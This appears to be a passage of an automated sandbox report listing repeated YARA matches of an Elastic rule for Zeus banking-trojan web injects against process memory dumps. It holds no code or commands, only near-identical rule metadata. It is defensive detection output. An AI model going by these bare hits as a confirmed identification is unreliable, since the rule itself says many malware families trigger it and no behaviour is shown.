    Source: 00000001.00000003.2150985581.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000006.00000002.2323573296.0000000002550000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2119790321.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2134678056.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0000001B.00000002.2126064053.00000000014F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0000000D.00000002.2347000014.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000015.00000002.2119300730.00000000022D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2144510706.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000023.00000002.2140900930.0000000002060000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000025.00000002.2162183852.0000000002D30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0000001D.00000002.2129537008.0000000002CC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000005.00000002.2309709711.00000000015E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2083010707.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2143538068.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000002.2976326837.0000000002CF3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2147883397.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2148685865.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000017.00000002.2120228960.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0000000D.00000002.2347461629.0000000003100000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2125875066.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000017.00000002.2120830314.0000000003200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000005.00000002.2310035862.0000000002F60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2142779686.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2150623127.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2106522225.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000023.00000002.2141147552.00000000020C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000013.00000002.2113815315.0000000002540000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2144870121.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000025.00000002.2196325430.0000000003140000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0000001D.00000002.2129989380.0000000002E60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0000001F.00000002.2132321964.0000000001040000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2149738925.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.1746712616.0000000002A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000002.2975747606.0000000002A06000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000013.00000002.2114823849.0000000002910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000019.00000002.2124084846.0000000000890000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2145983048.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000021.00000002.2137945302.00000000032F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000001.00000003.2112552802.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
